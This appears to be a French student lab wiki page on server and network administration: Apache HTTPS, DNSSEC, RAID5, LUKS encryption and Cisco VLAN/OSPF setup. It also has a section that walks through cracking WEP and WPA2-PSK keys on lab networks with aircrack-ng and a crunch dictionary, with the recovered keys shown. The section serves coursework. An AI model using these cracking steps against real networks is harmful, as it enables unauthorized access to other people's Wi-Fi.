Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
